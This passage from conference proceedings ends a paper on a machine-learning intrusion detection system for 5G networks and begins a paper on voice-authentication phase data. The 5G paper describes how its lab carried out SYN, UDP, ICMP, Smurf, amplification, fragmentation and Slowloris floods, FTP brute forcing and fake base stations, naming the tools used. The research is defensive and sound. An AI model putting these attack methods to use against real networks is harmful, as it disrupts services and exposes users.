dataset is spitted into four main parts: PROBE, DOS, U2R and R2L. The DOS part itself contains subcategories such as APACHE2, LAND, BACK, POD, NEPTUNE, SMUR, TEARDROP and MAILBOMB. The U2R part includes subcategories such as BUFFER_OVERFLOW, SQLATTACK, and ROOTKIT. The R2L category includes subcategories such as FTP_WRITE, GUESS_PASSWD, and SNMPGETATTACK, while the PROBE category includes subcategories such as IPSWEEP, NMAP, and PORTSWEEP. The R2L and U2R parts include the vectors of software security attack vectors. Therefore, using the NSL-KDD dataset to train an IDS system is relevant in the context of 5G and beyond networks, as it covers all attack vectors that can be filtered on a 5G and beyound network.
660
M. Iavich et al.
It must be mentioned that NSL-KDD is the old dataset, so we also offer to train the IDS using the relevant DOS and DDOS dataset. The dataset contains the DOS and DDOS attacks collected during 2020 and 2021 years [16–22]. The dataset includes the data about DOS and DDOS attacks: ‘MSSQL’, ‘NetBIOS’, ‘LDAP’, ‘UDP’, ‘Syn’, ‘Portmap’ and ‘UDPLag’ attacks. The size of the dataset is 1.2 GB. Another approach is to integrate into the IDS the ability to protect against Battery drain attacks, MNmap and MiTM. 3.2 MNmap, MiTM and Battery Drain Attacks MNmap MNmap, that stands for “mobile network mapping” is the approach of generating a 5G network map, which includes information about connected devices. E.g.: addresses, vendors, signal strength, geolocation etc. This attack has nothing in common with the famous software called “Nmap”, which cybersecurity specialists and hackers use to probe networks. Attack is a consequence of the MiTM, we will also explain that particular attack in following section. When a device is being connected to the base station, it sends its metadata and other valuable information to the station, or the station can query the device to send this data itself. In case of MNmap attack, the attacker creates or spoofs already existing base station, urges clients to connect to it and causes MitM. Also forces devices to send metadata to the station. As a result of this passive reconnaissance, hackers get information about victim’s geolocation, operating system and other valuable data which can further be used to obtain control over victim’s systems. The process is illustrated on the Fig. 2.
Fig. 2. MNmap attack
5G Security Function and Its Testing Environment
661
MitM Attack Recently, it was revealed that hackers have the ability to launch Man-in-the-Middle (MiTM) attacks on 5G infrastructure by creating fake base stations. This allows users to unknowingly connect to these fake stations, which enables the attacker to intercept and forward traffic to the legitimate base station or core layer, similar to spoofing an ESSID and BSSID of a Wi-Fi access point. This can result in the interception of sensitive information and all traffic passing through the fake base station. In addition to private information disclosure, hackers may also manipulate information in real-time. Another concerning issue is that hackers can pivot from the base station to the core segment or attempt to exploit unknown vulnerabilities. The process is illustrated on the Fig. 3.
Fig. 3. MitM attack.
Battery Drain Attack Battery drain attack is the application layer attack which can cause severe damage to the NB-IoT devices. NB-IoT, which stands for Narrowband IoT, is a standard developed by the 3GPP to grant access to the 5G network even in the indoor environment, where millimeter waves, used by the 5G infrastructure are unproductive.
662
M. Iavich et al.
In the PSM (Power Saving Mode), integrated battery of these devices can serve for approximately ten years. In the case, if PSM parameter is altered somewhere in the middle between the client and NB-IoT device, battery life time will get reduced. It will tremendously cause the DoS attack (without a battery device will not be able to function) and it can cause the financial-physical damage to the device itself. The process is illustrated on the Fig. 4.
Fig. 4. Battery drain attack
Mitigation It is evident that these three attacks share a common building block, which is the method of execution, namely, the Man-in-the-Middle (MitM) attack. Therefore, the most feasible solution to address this issue is to prevent hackers from creating fake base stations and spoofing legitimate ones, both of which involve manipulating information on the second layer of the OSI model. For instance, let us consider two Wi-Fi access points, one legitimate and the other spoofed. The setup would resemble the following: Legit AP BSSID – AA: BB: CC: DD: EE: FF ESSID – CHECK Spoofed AP BSSID – AA: BB: CC: DD: EE: FF ESSID – CHECK
5G Security Function and Its Testing Environment
663
As depicted in the example, both access points share the same addresses, making it challenging to distinguish between the legitimate and the spoofed one. One theoretical solution to this problem is to incorporate an additional antenna that continuously operates in monitoring mode and sends information about access points to a software program, which analyzes the data to detect any coincidences between the legitimate ESSID/BSSID and the information from the scanner. If a match is found, it indicates that the access point is spoofed. However, this approach has a few limitations, such as the inability to detect spoofed devices that are out of the antenna’s range. Nonetheless, this issue can be resolved by acquiring a rotating directional antenna or an isotropic antenna with more power. Similarly, we can use the same approach to identify spoofed 5G base stations. As for fake base stations, we can create a list of legitimate ones and share it across all base stations. If a base station that is not on the whitelist appears, it indicates that it is a fake one. The process is illustrated on the Fig. 5.
Fig. 5. Mitigation
4 The Offered Methodology Our Intrusion Detection System (IDS) was trained using two datasets related to DoS and DDoS attacks. One contained the patterns of 2020 and one of 2021 year. Our system is capable of mitigating Battery drain, MNmap and MiTM attacks. We utilized a classification algorithm and developed a multilayer neural network model to train our dataset. The NSL-KDD dataset was divided into a training dataset (90%) and a test dataset (10%),
664
M. Iavich et al.
while the DOS/DDOS dataset was partitioned into two datasets, each containing 80% and 20% of the information. Our data partitioning approach produced the best accuracy results during the training process. The model was trained separately with each dataset, resulting in an accuracy of 0.9711049372916336 for the NSL-KDD dataset and 0.9998861703182078 for the DOS dataset. Once the training process was completed, the system remained idle and waited for input data from the network sniffer. The input data underwent an initial check for any attack patterns present in the NSL-KDD dataset. If an attack pattern was identified, it was transferred to the intrusion protection system (IPS). Simultaneously, the input data was also checked for any attack patterns from the DOS dataset, and if found, was also passed to the IPS. Additionally, the input data was checked for MNmap, MiTM, and Battery drain attacks. Any detected attacks were also forwarded to the IPS. In cases where no attack patterns were identified, the IDS system reported that the analyzed traffic was not suspicious and proceeded to process the next input data block. The core of the IDS system was based on the following pseudocode: Class IDS: Importing of the libraries Private: X = None # first training variable Y = None # second training variable Model = None # NN model variable def __init__(file, model_t): #Constructor Preprocessing data … def make_model(model_t): Make NN model Return NN model def model_train(data, model_t): Training model Return the model def model_test (model, model_t): test and measure the accuracy score return the score Public: def predict(data_x): Predicting … return def accuracy_print(model_t): Return IDS.model_test()
5G Security Function and Its Testing Environment
Class MITM: Importing the necessary libraries Printing the task for choosing the interface Def __init__(): ints=getinterface() #getting the network interfaces for i in ints: print(i) #printing the interfaces int=scanf() # input the interface name ssid=scanf() # input the SSID bssid=scanf() # input the BSSID def air_scan(): scanning the air for the existing networks setting the duration to ten seconds saving the result to CSV file def run_air_scan (): air_scan() # calling the function scan=read("scan.csv") # reading CSV file for line in scan: { if bssid in line: bssidc=bssidc+1 if ssid in line: ssidc=ssidc+1 } print("BSSID COUNT: ", bssidc) print("ESSID COUNT: ", ssidc) def check(): comparing bssidc and ssidc to one if bssidc or ssidc number is more than one: print(“MITM detected”) else: print (“everything is ok”) continue Importing the necessary libraries Concrete_IDS = IDS(df1) # making the dos prediction model IDS_KDD = IDS(df2) # making KDD2020 prediction model mitm= MITM()
665
666
M. Iavich et al.
process_wait(traffic) # process to catch the traffic Def KDD_check(): KDD=True IF IDS_KDD.predict(df) == attack_KDD IPS.response_KDD() Else: KDD=FALSE Return KDD Def check_DOS(): DOS=True IF concrete_IDS.predict(df) == ‘DOS_attack’: IPS.response_dos Else: DOS =FALSE Return DOS Def MITM_check(): MITM_F=True mitm.run_air_scan () if mitm.check() =’MITM_attack’: IPS.response_mitm Else: MITM_F=False Retrun MITM_F t1=threading.Thread(target= check_KDD) t2=threading.Thread(target= check_DOS) t3 =threading.Thread(target= check_MITM) Starting and joining thread If DOS==FALSE and MITM_F ==FALSE and KDD==FALSE: Print (“There is not any attack”)
5 Laboratory To validate our research findings, we required a specialized laboratory to conduct our experiments and create a set of attack scenarios. The proposed laboratory setup includes a layer two switch that facilitates basic connectivity between hosts, two access points, an IDS module for detecting spoofing, an attacker host, a defender server equipped with an IPS module, fifty Raspberry Pi devices for executing the attacks, and an equal number of 4G modems with SIM cards. The following is a simplified model of the laboratory setup (Fig. 6):
5G Security Function and Its Testing Environment
667
Fig. 6. The model of the laboratory
It must be noted that IDS does not support the ‘pcap’ format in which traffic is received. Therefore, it is necessary to convert the ‘pcap’ files to ‘NSL KDD’ and ‘CICDDoS2021’ formats, which are supported by IDS. To achieve that goal, it is offered to use the tools can be found in internet. To convert the ‘pcap’ to ‘NSL KDD’, we used “Zeek” IDS together with https://github.com/inigoperona/tcpdump2gureKDDCup99 tool. To convert ‘pcap’ to ‘CICDDoS2021’ we used the official tool - ‘CICFlowMeter’ tool. To create a testing environment, we utilized the ‘Oracle VirtualBox’ as a host-based hypervisor, which included two virtual instances of “Parrot OS” and two virtual instances of “Ubuntu 20.04” located within a virtual NAT network. To simulate reflected DoS attacks, we employed fifty raspberry PI nodes and captured and executed various attacks. One such attack was the TCP Syn flood attack (also known as Neptune), which utilized the TCP protocol to ensure that all data sent was delivered in one piece. This was accomplished through the use of TCP sequence numbers, where one side sent a number (SYN) and the other side acknowledged it by returning an ACK plus SYN number itself, which had to be acknowledged by the first side. This process is known as a TCP three-way handshake and can be illustrated as follows (Fig. 7):
668
M. Iavich et al.
Fig. 7. TCP Syn flood attack
It is possible for the hacker to flood the server with a lot of SYN requests to different TCP ports. Server replies to them with a SYN-ACK and waits for final ACK to complete a three-way handshake, but never receives it, so the server is induced to keep this connection open and wait for the ACK for some time and even after this connection is closed, server immediately receives a new SYN from the attacker machine. This means that we have a lot of half-open connections, eventually server memory is overflowed by SYN connections, which causes DoS to occur. To make this attack, hping3 tool was used. Many SYN segments were sent to the victim machine. UDP Datagram Flood Attack - the protocol is commonly used for VoIP and streaming as it does not need handshakes and is much more efficient than TCP. The hacker can send out a lot of UDP datagrams to the random ports of victim server. When a server tries to extract the application from a datagram, it may find that there is no application present. In such cases, the server sends back a packet that destination was unreached. Since UDP is a fast protocol, the mentioned server can quickly become overwhelmed by a large number of datagrams, leading to performance issues. To make this attack, hping3 tool was used. A big amount of UDP datagram was sent to victim’s machine (Fig. 8).
Fig. 8. UDP datagram flood attack
ICMP Flood - This type of attack is relatively simple to execute - it involves flooding a victim server with a large number of ICMP (also known as ping) messages, and it ultimately leads to a Denial of Service (DoS) (Fig. 9).
5G Security Function and Its Testing Environment
669
Fig. 9. ICMP flood attack
For this attack, the hping3 tool was used to send ICMP echo requests to the victim machine at a high frequency. LAND Attack This attack involves using a crafted TCP SYN packet with a source IP address and source port that are the same as the destination IP address and destination port. When the victim gets this packet, it mistakenly sends it back to itself, resulting in an infinite loop that leads to a system resource overflow and ultimately, a Denial of Service (DoS) (Fig. 10).
Fig. 10. LAND attack
To execute this attack, we used the hping3 tool to send packets with the same source IP address and destination IP address, as well as the same source port and destination port, to the machine of the victim. HTTP Flood Attack This particular attack does not require the use of fake or malformed packets. Instead, it relies on a high volume of legitimate HTTP requests being sent out by a botnet, which overwhelms the server’s resources and leads to a Denial of Service (DoS) condition. For this attack, TorHammer tool was used to send numerous HTTP headers to the machine of victim (Fig. 11).
670
M. Iavich et al.
Fig. 11. HTTP flood attack
Portmap Attack - Portmapper is an RPC service that runs on both UNIX and Windows machines. As with different reflected DoS attacks, it is possible to generate a large response that is ultimately sent to the victim machine by issuing a simple query with a spoofed IP address (the victim’s IP). To carry out this attack, we used modified rpcinfo software that utilized a spoofed IP address. As a result, all of the RPC responses were transfered to the machine of the victim (Fig. 12).
Fig. 12. Portmap attack
Smurf Attack This attack is an ICMP-based attack, but it is more complex than a simple ping flood. In this attack, a ping packet is sent to a broadcast address, but with a spoofed source
5G Security Function and Its Testing Environment
671
IP address that matches that of our victim. This causes the response to be amplified, resulting in a much larger response being sent to the victim machine (Fig. 13).
Fig. 13. Smurf attack
After the needed number of pings, the DoS attack will be implemented. The hping3 tool was utilized to execute the attack described. By sending a ping request to the broadcast IP address with a spoofed source IP set to the victim’s IP, all the ICMP reply packets were redirected to the victim’s machine. For the TCP/UDP ports scan on the victim’s machine, the Nmap tool was employed. To carry out the SNMP amplification attack, we exploited the SNMP protocol to manage and gather information from devices such as servers, printers, and switches. The attacker sent a big amount of requests with a forged IP address (victim’s IP) to the SNMP devices, resulting in an amplification of the SNMP reply, which is much larger than the original request. The excess traffic was then directed towards the victim’s machine, causing a DoS. To conduct the SNMP amplification attack, we utilized GetBulk messages in order to amplify the traffic and direct it to the victim’s machine. The SNMP device was sent a spoofed request of the service’s current configuration, which returned the answer to the victim’s machine due to the spoofed source IP. It’s important to note that several attacks from the ‘CICDDoS2021’, such as the NETBIOS attack, have not been executed yet due to specific project requirements (Fig. 14). Password Brute Forcing - During our tests, we carried out an attack on the FTP server using the password brute forcing technique, which involves attempting to guess a password by systematically selecting letters or words from a dictionary. For this attack, we utilized the tool Ncrack and a word-list specifically designed for this purpose. The brute force attack on the FTP server was carried out using a virtualized network (Fig. 15). IP Fragmentation Attack - IP fragmentation involves splitting a large IP packet into smaller pieces or shards that are scattered throughout the network and then reassembled
672
M. Iavich et al.
Fig. 14. SNMP amplification attack
Fig. 15. Password brute forcing attack
at the destination. This is done as every network has a maximum limit for the size of the datagram it can process, which is known as the Maximum Transmission Unit (MTU). If a server gets a datagram larger than the MTU, it must be split. However, there are several attacks that can exploit the fragmentation mechanism. One such attack is the ICMP and UDP fragmentation attack, where the hacker sends a fake packet that is larger than the MTU. The packet is fragmented, but the destination server cannot reassemble it because it is fake. This is similar to having a puzzle with identical pieces where there is nothing that can be done but to try to assemble it, causing a headache. This attack results in a denial of service (DoS). Another attack is the TCP fragmentation attack, also known as Teardrop. The objective of these attacks is to disrupt the victim machine’s ability to assemble fragmented packets through manipulation of its TCP/IP reassembly mechanisms. By overwhelming the victim server with overlapping packets, a Denial of Service (DoS) is triggered (Fig. 16).
5G Security Function and Its Testing Environment
673
Fig. 16. IP fragmentation attack
The “scapy” python library was used to this attack. POD (Ping of Death) - The maximum size for a packet that can be sent out is 65,535 bytes. In order to bypass this limit, an attacker may send out a series of fragmented packets, each of which is smaller than the maximum size, such as 64,000 bytes. However, when the victim server gets all of the fragments and tries assembling them, it finishes with an oversized packet, and it can lead to a memory overflow and result in a DoS attack (Fig. 17).
Fig. 17. POD attack
For this attack, a custom script was utilized that sent oversized segmented packets. Slowloris Attack - This type of attack targets a web service, similar to the Neptune attack. The client sends numerous number of HTTP requests, which will never be completed. The attacked server keeps opening connections until a denial of service (DoS) occurs (Fig. 18).
674
M. Iavich et al.
Fig. 18. Slowloris attack
Nmap script was used for this attack. NTP Amplification Attack - NTP is a protocol used to obtain accurate time over the internet. However, some older NTP servers have a monitoring service that can count traffic. The hacker can exploit this by sending a command that asks for a list of the last six-hundred hosts connected to the NTP server (monlist), but with a spoofed source IP that belongs to the victim. As a result, the NTP server sends a list of hosts to the victim’s IP, causing a memory overflow and resulting in a denial of service (DoS) attack (Fig. 19).
Fig. 19. NTP amplification attack
The attack was carried out by sending “monlist” queries to the NTP server with a spoofed source IP. DDoS Attacks Simulation - To simulate DDoS attacks, a laboratory environment was utilized. The attacker hosts received directives from the server through Ansible software, which uses SSH protocol to connect to the hosts and execute commands. During the
5G Security Function and Its Testing Environment
675
attacks, an IDS module was deployed on the targeted server to detect and identify any suspicious activity (Fig. 20).
Fig. 20. DDoS attack
6 Experiments We created the little test laboratory with fifty RASPBERRY PI devices, we have also used the same amount of 4G modems with 4G sim cards. We had the server with the offered IDS. The following attacks vectors were implemented on the server: BACK, SMURF, NEPTUNE, NMAP, LAND, POD, BUFFER_OVERFLOW, TEARDROP, ROOTKIT, LOADMODULE, FTP_WRITE, IMAP, MULTIHOP, GUESS_PASSWD, PHFPROBE, IPSWEEP, SPY, Portmap, PORTSWEEP, MSSQL, SATAN, NetBIOS, LDAP and Syn. It is crucial to secure 5G networks against these vectors of attacks. Twenty various man in the middle attacks were also implemented. While conducting attacks by means of the network sniffer, we checked the traffic generated and parsed all the relevant parameters for DOS and NSL-KDD samples with Python. We then transformed the result into the format of the initial datasets and sent all the information to IDS system for analysis (Table 1).
676
M. Iavich et al. Table 1. The result of the attacks.
Attack type
Number of attacks
Identified attacks
LAND
100
100
BACK
100
99
NEPTUNE
100
98
SMURF
100
96
POD
100
100
TEARDROP
100
82
FTP_WRITE
100
86
LOADMODULE
100
91
BUFFER_ OVERFLOW
100
76
ROOTKIT
100
62
MULTIHOP
100
92
SPY
100
52
GUESS_PASSWD
100
100
IPSWEEP
100
98
PROBE
100
92
PORTSWEEP
100
96
NMAP
100
98
LDAP
100
98
SATAN
100
82
MSSQL
100
99
NetBIOS
100
98
Syn
100
100
Portmap
100
97
20
20
Man in the middle
7 Results We have developed a new Intrusion Detection System (IDS) that focuses on 5G attacks, using machine learning algorithms. The IDS was trained using the NSL-KDD dataset and DOS/DDOS attacks dataset, utilizing attack vectors that are vulnerable in 5G. In addition, we conducted an analysis of the MNmap, MiTM, and Battery Drain attacks, identifying the factors that contribute to their success. We have created the model of the protection against these attacks. This model is implemented and integrated into our IDS. The 5G oriented attacks were implemented, our IDS was assessed using these attacks. Rather good results are received.
5G Security Function and Its Testing Environment
677
8 Discussion When conducting the attacks on our systems using the offered test laboratory, we have identified that our novel IDS protects the system rather well, but it has some problems of efficiency. The efficiency is improved by means of parallel programming approach, but in order to use the system in the real world the system must be optimized. Our team of researcher is working on improving its efficiency. We are also working on collecting and creating the new training patterns for IDS.
9 Conclusions The offered IDS offers the good level of security, but it still have the efficiency problems. The IDS can also protect the system against the most relevant attacks, such as Battery drain attacks MNmap and MiTM. The global work must be conducted to offer the efficient and secure 5G services. This research can assist users in selecting the most effective mitigation strategy. Moreover, the system is well-suited for securing the hardware-based infrastructure of larger organizations, ensuring compliance with even the strictest regulations, such as the European General Data Protection Regulation, through practical and effective implementation. Acknowledgement. This work was supported by Shota Rustaveli National Foundation of Georgia (SRNSFG) [NFR-22-14060].
References 1. Osseiran, A., et al.: Scenarios for 5G mobile and wireless communications: the vision of the METIS project. IEEE Commun. Mag. 52(5), 26–35 (2014). https://doi.org/10.1109/MCOM. 2014.6815890 2. Holma, H., Toskala, A.: LTE for 5G: evolution or revolution? IEEE Commun. Mag. 54(2), 104–110 (2016). https://doi.org/10.1109/MCOM.2016.7402275 3. Di Felice, M., Piro, G., Grieco, L.A.: 5G networks: opportunities and challenges for smart cities. IEEE Commun. Mag. 55(3), 32–37 (2017). https://doi.org/10.1109/MCOM.2017.160 0924 4. Rost, P., et al.: Network slicing to enable scalability and flexibility in 5G mobile networks. IEEE Commun. Mag. 55(5), 72–79 (2017). https://doi.org/10.1109/MCOM.2017.1600935 5. Qureshi, H.N., Manalastas, M., Ijaz, A., Imran, A., Liu, Y., Al Kalaa, M.O.: Communication requirements in 5G-enabled healthcare applications: review and considerations. Healthcare 10, 293 (2022). https://doi.org/10.3390/healthcare10020293 6. Choudhury, P., Sahoo, M., Mohapatra, S.K., Das, S.K.: A comprehensive review on security threats and solutions in 5G networks. IEEE Netw. 35(1), 72–81 (2021). https://doi.org/10. 1109/MNET.011.2000213 7. Qadir, J., Ahmed, S.H., Abbas, H.: 5G security challenges and opportunities: a review. IEEE Access 8, 188684–188703 (2020). https://doi.org/10.1109/ACCESS.2020.3033864 8. Bocu, R., Iavich, M., Tabirca, S.: A real-time intrusion detection system for software defined 5G networks. In: Barolli, L., Woungang, I., Enokido, T. (eds.) AINA 2021. LNNS, vol. 227, pp. 436–446. Springer, Cham (2021). https://doi.org/10.1007/978-3-030-75078-7_44
678
M. Iavich et al.
9. Iavich, M., Gnatyuk, S., Odarchenko, R., Bocu, R., Simonov, S.: The novel system of attacks detection in 5G. In: Barolli, L., Woungang, I., Enokido, T. (eds.) AINA 2021. LNNS, vol. 226, pp. 580–591. Springer, Cham (2021). https://doi.org/10.1007/978-3-030-75075-6_47 10. Saha, T., Aaraj, N., Jha, N.K.: Machine learning assisted security analysis of 5G-networkconnected systems. IEEE Trans. Emerging Topics Comput. 10(4), 2006–2024 (2022). https:// doi.org/10.1109/TETC.2022.3147192 11. Tavallaee, M., Bagheri, E., Lu, W., Ghorbani, A.A.: A detailed analysis of the KDD CUP 99 data set. In: 2009 IEEE Symposium on Computational Intelligence for Security and Defense Applications, pp. 1–6 (2009).https://doi.org/10.1109/CISDA.2009.5356528 12. Su, T., Sun, H., Zhu, J., Wang, S., Li, Y.: BAT: deep learning methods on network intrusion detection using NSL-KDD dataset. IEEE Access 8, 29575–29585 (2020). https://doi.org/10. 1109/ACCESS.2020.2972627 13. Meena, G., Choudhary, R.R.: A review paper on IDS classification using KDD 99 and NSL KDD dataset in WEKA. In: 2017 International Conference on Computer, Communications and Electronics (Comptelix), Jaipur, India, pp. 553–558 (2017). https://doi.org/10.1109/COM PTELIX.2017.8004032 14. Singh, R., Bhattacharyya, D.K.: Intrusion detection system: a comprehensive review. J. Netw. Comput. Appl. 36(1), 16–24 (2013). https://doi.org/10.1016/j.jnca.2012.09.005 15. Oshima, S., Nakashima, T., Sueyoshi, T.: Early DoS/DDoS detection method using short-term statistics. In: 2010 International Conference on Complex, Intelligent and Software Intensive Systems, pp. 168–173 (2010). https://doi.org/10.1109/CISIS.2010.53 16. Danik, Y., Hryschuk, R., Gnatyuk, S.: Synergistic effects of information and cybernetic interaction in civil aviation. Aviation 20(3), 137–144 (2016) 17. Liu, G., Chen, H., Wu, X., Wang, L.: A deep learning-based DDoS attack detection approach in software-defined networking. IEEE Access 9, 40156–40164 (2021). https://doi.org/10.1109/ ACCESS.2021.3062849 18. Ahmad, M., Javaid, M., Malik, A.N., Imran, W.A., Khan, Z.A.: DDoS attack detection and mitigation using machine learning: a systematic review. HCIS 11(1), 1–24 (2021). https:// doi.org/10.1186/s13673-021-00263-8 19. Zafeiropoulos, A., Nikaein, N., Tsolkas, D., Papaefstathiou, I.: A machine learning approach to the detection and mitigation of DDoS attacks in 5G networks. Sensors 21(3), 937–961 (2021). https://doi.org/10.3390/s21030937 20. Bhatia, K.M.S., Sharma, H., Kumar, M.: A machine learning-based approach for detection and mitigation of DDoS attacks in cloud computing. J. Netw. Syst. Manage. 29(2), 480–511 (2021). https://doi.org/10.1007/s10922-020-09574-7 21. Li, Y., Zheng, S., Feng, Y., Guan, C.: A review of machine learning techniques for DDoS detection and mitigation. J. Comput. Sci. Technol. 36(3), 475–497 (2021). https://doi.org/10. 1007/s11390-020-0219-1 22. Krishnan, M.R.K., Chandrasekar, P.R.: A machine learning-based DDoS attack detection and mitigation system for fog-enabled 5G networks. IEEE Internet Things J. 8(7), 5639–5650 (2021). https://doi.org/10.1109/JIOT.2021.3073771 23. Zhang, M., Zhou, C., Lu, Y., Zheng, W., Qiu, S.: A novel DDoS attack detection method based on dynamic time warping and fuzzy clustering. IEEE Access 9, 15097–15106 (2021). https://doi.org/10.1109/ACCESS.2021.3055941
Results of Experimental Research on Phase Data of Processed Signals in Voice Authentication Systems Mykola Pastushenko(B)
and Yana Krasnozheniuk
Kharkiv National University of Radio Electronics, 14 Nauky Ave., Kharkiv, Ukraine {mykola.pastushenko,yana.krasnozheniuk}@nure.ua
Abstract. The number of cybercrimes in infocommunications area is growing, and they are becoming more sophisticated. According to the Cisco 2018 Annual Cybersecurity Report, spreading malicious software (in particular, ransomware), the volume of encrypted web traffic transmitted by cybercriminals, and the number of e-mail threats have increased. To protect financial and information resources pin codes, passwords, identification cards are used; however, they can be lost or counterfeited. Biometric authentication is now a solution these problems. Initially, static biometric features (fingerprints, face shape and size, iris and retina patterns) were mostly used, especially in forensic science. Due to simple forgery and limited amount of analyzed data in access systems, preference is given to behavioral biometric features, especially to the user voice signal. Voice systems are preferred by the efficiency/cost criterion. Moreover, voice systems have additional advantages: simplicity, ease of use, complexity of counterfeiting, remote use through communication channels, unlimited operational increase in password phrases, and the availability of digital data processing achievements. Unfortunately, the qualitative characteristics of voice authentication systems yield to systems which use static biometric features because the formation of a user’s template is based on amplitude and frequency information. One of the directions for improving the quality indicators of voice authentication systems, according to the authors, is to use phase information of registration materials, which has not been sufficiently considered in the scientific literature. The object of research is the process of digital processing of speech signals in voice authentication systems. Research methods include analysis, observation, measurement, modeling and experiment. The paper considers the procedures for the formation and direction of voice signal phase data use in authentication systems. The feasibility of phase data use, which allows to improve qualitative indicators of the considered systems, is essentially proved on the example of processing experimental voice signals. Keywords: amplitude · authentication · voice signal · information · spectrum · phase · pitch frequency
© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 E. Faure et al. (Eds.): ITEST 2022, LNDECT 178, pp. 679–696, 2023. https://doi.org/10.1007/978-3-031-35467-0_40
680
M. Pastushenko and Y. Krasnozheniuk
1 Introduction In recent decades, the dynamics of economic growth, the level of well-being of the population, the competitiveness of a state in the world community, the degree of ensuring its national security and equal integration into the world economy are largely determined by the achievements of science and the latest technologies. The rapid development and widespread introduction of modern information and communication systems into all spheres of human life testifies to the transition of mankind from an industrial society to an information society, which is based on the latest communication means and systems. The number, technical level and availability of information and communication systems determine the degree of development of a country and its status in the world community, and in the near future, undoubtedly, will become a decisive indicator of this status. It is known that the process of informatization of the world community also gives rise to a complex of negative phenomena. Indeed, the high complexity and at the same time the vulnerability of all infocommunication systems on which regional, national and world information spaces are based, as well as the fundamental dependence on their stability of state infrastructures lead to the emergence of fundamentally new threats. The widespread use of distributed infocommunication systems in all spheres of human activity raises the problem of ensuring information security in such systems. It is known that the protection of financial resources, information data and computing resources is primarily associated with the provision of reliable identification and authentication of the user. Many authentication methods and more implementations of these methods are known. However, not all classical solutions to the authentication problem can be used in distributed infocommunication systems. At the same time, various types of systems require the implementation of their unique features for authentication subsystems. At the same time, the intensive development of computer technology makes it possible to easily break authentication algorithms, which were considered reliable 10–15 years ago. Here we note that in 2019, the total estimated income of fraudsters received using bank cards in Ukraine increased from UAH 245.8 million to UAH 361.99 million (up 47.3%), as reported by the Deputy Director of the Ukrainian Interbank Association of Members Payment Systems «EMA» Olesya Dalnichenko. The reason for this is the unreliability of password protection (PIN codes) of bank cards, which is mainly used in Ukraine. Therefore, now there is a continuous and intensive work in the field of research and development of authentication methods. At the same time, new and existing algorithms constantly appear and existing algorithms are aimed at ensuring reliable user authentication. The problem of authenticating users who have access to public and personal information resources is becoming more and more urgent. This problem is of particular importance for open, mass telecommunication and information systems. The most promising direction for protection of such systems from unauthorized influences is the use of biometric methods for identifying and authenticating users. At the same time, despite all its attractiveness, the use of biometrics is fraught with a number of serious problems. The development and implementation of biometric authentication systems was associated with static biometric characteristics of a user (face image, finger papillary pattern and iris of the eye), which have proven themselves well in forensic science. To date, these
Results of Experimental Research on Phase Data of Processed Signals
681
hopes have been dashed, mostly due to the simplicity of counterfeiting the analyzed features. In this regard, now a lot of research is being carried out in the field of using dynamic (behavioral) biometric characteristics of the user. Among these biometric systems, a special place is taken by voice authentication, which is distinguished by simplicity and convenience and is the best in terms of efficiency/cost. At the same time, like all biometric systems, voice authentication has low quality characteristics. Therefore, in the field of voice authentication, a lot of studies are being carried out, as evidenced, for example, in [1–4]. Currently, in voice authentication systems (VASs), the amplitude information of the user’s polyharmonic non-stationary voice signal is recorded and used. User authentication is carried out mainly in the process of analyzing the amplitude-frequency spectrum of registration materials [2]. At the same time, the main efforts of researchers are focused on the search for new or improvement of existing procedures for the formation (assessment) of user’s templates (a set of attributes – pitch frequency, formant data, cepstral coefficients, mel-frequency cepstral coefficients, linear prediction coefficients and their dynamic characteristics, etc.). At the same time, the differences between the templates in the field of amplitude-frequency information are insignificant. Therefore, rather complex decision rules are used to form decisions. The most popular among the latter are the following decision-making procedures – Gaussian Mixture Model (GMM) and Support Vector Machine (SVM) methods. For these purposes, artificial neural networks and Hidden Markov Models (HMM) are also used. Analysis of the richer experience in digital signal processing in the field of radio communication and radar shows that to improve the quality indicators of signal processing in these areas, as a rule, the following is used [5]: – increasing the signal-to-noise ratio due to preliminary processing of registration materials; – synthesis of higher quality (for example, taking into account a priori information) procedures for the selection (parameter estimation) of signals; – use of all information parameters of the recorded signals. In this work, we will focus on the use of the phase information of the voice signal, which is currently not widely used in the existing VASs. The phase information of a voice signal has traditionally been ignored [2], although it has long been known [6] that phase data are more informative. Moreover, the use of the phase makes it possible to more efficiently implement the preliminary processing of registration materials, which improves the quality characteristics of traditional procedures used in modern VASs. The purpose of this work is to study the influence of modern advances in digital information processing on the accuracy of assessing individual characteristics of the analyzed voice signal in the process of forming a user template. The object of the research is the process of digital processing of voice signals.
682
M. Pastushenko and Y. Krasnozheniuk
2 General Problem Statement An increase in the quality indicators of modern VASs is associated, first of all, with a change in the paradigm of digital processing of materials for recording a user’s voice signal, which involves adding traditional procedures for analyzing the amplitude-frequency spectrum with modern achievements in digital data processing, including algorithms for formation, preprocessing and accounting of phase data of the user’s voice signals. Thus, at present there is another way to improve the quality indicators of modern VASs, which is based, first of all, on the full use of the phase information of the user’s voice signal. The reasons for the limited use of phase data in the VASs are as follows. It is known that the formation of phase information requires additional computational and algorithmic resources, which were not always available in these applications. It should be noted here that earlier in radar and radio communication, to obtain phase data, special bulky devices were used - phase shifters, which could not be used in the field of digital processing of voice signals. Currently, there are specialized microcircuits and digital signal processors that are applicable in the field of digital processing of voice signals. In addition, there are some features of the formation, preprocessing and use of phase data. It should be noted that there is currently no experience and practice of using the phase of the speech signal in relation to the tasks of voice authentication. This is confirmed by the fact that only a limited number of works are known where phase data were used in the processing of speech signals. For example, in [7], the relevance of using phase information in the processing of speech data is indicated, and in [8], the phase was used to refine the frequency characteristics of the processed voice data. In [9], a comparative analysis of the procedures for assessing the phase relationships between the pitch oscillations and overtones of speech signals was carried out, which the authors propose to use to solve the problems of speech sounds recognition and speaker identification. The above emphasizes the relevance of studies on the assessment of the informativeness of phase data and their influence on the qualitative characteristics of voice authentication procedures. Phase data in voice authentication can be used in several ways: – as an increase in the signal-to-noise ratio of recording materials (a well-known direction of using the phase in radar and radio communication); – improving the quality of the formation of attributes for traditionally used patterns, for example, pitch frequency, formant information, etc.; – development of new procedures for the formation of template elements based on phase data [10].
3 Work-Related Analysis The most complete, detailed and systematized analysis of scientific works in this area is carried out in [11, 12]. At the same time, works up to 2012 are considered in [11], and an analysis of scientific articles from 2012 to 2017 is carried out in [12]. Below we will focus only on some work in the field of voice authentication.
Results of Experimental Research on Phase Data of Processed Signals
683
